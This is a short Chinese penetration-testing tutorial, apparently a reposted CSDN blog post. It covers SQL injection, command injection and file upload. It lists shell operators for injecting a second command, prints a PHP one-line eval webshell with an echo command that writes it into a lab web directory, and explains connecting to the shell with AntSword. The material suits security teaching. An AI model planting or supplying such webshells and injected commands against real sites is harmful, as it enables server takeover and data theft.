Web渗透之常见的网站攻击方式

常见的网站漏洞有哪些?

SQL注入:泄露破坏数据库,数据库中可能有账号密码等敏感信息

命令执行:获取目标机器命令权限,执行非法命令,破坏或控制受害机

文件上传:上传后门病毒木马到网站中,破坏网站甚至系统


从命令执行漏洞到getshell

cmd1|cmd2:无论cmd1是否执行成功,cmd2将被执行

cmd1;cmd2:无论cmd1是否执行成功,cmd2将被执行

cmd1&cmd2:无论cmd1是否执行成功,cmd2将被执行

cmd1||cmd2:仅在cmd1执行失败时才执行cmd2

cmd1&&cmd2:仅在cmd1执行成功后,cmd2将被执行

写入网站后门-webshell

webshell是什么:webshell是以asp,php,jsp或者cgi等网页文件形式存在的一种命令执行环境,也可将其称做为一种网页后门。黑客在入侵一个网站后,通常会将asp或php后门文件与网站服务器web目录下正常的网页文件混在一起,以达到控制网站服务器的目的。

PHP一句话木马

                <?php eval($_POST['cmd']);?>

/eval  eval是php的语言构造器,作用是把字符串作为PHP代码执行

/$_POST['cmd']  以POST请求方式接收请求参数cmd

1.上传到哪? 常用命令:pwd dir  /var/www/html/vulnerabilities/exec

2.怎么上传? echo命令:echo“<?php eval(\$_POST['cmd']);?>"  > 1.php  指定内容到1.php

3.怎么访问? http://your_ip/vulnerabilities/exec/1.php

4.怎么使用木马?/ hackbar:浏览器插件,可以直接在浏览器中修改POST data

                            /webshell管理器:如蚁剑,菜刀都可以自动连接


蚁剑的使用方式

1.右键添加数据

2.添加数据

/url地址:webshell访问地址

/连接密码:webshell[ ] 包裹的字符串

3.连接webshell,控制网站

猜你喜欢

转载自blog.csdn.net/m0_56632799/article/details/128476304
今日推荐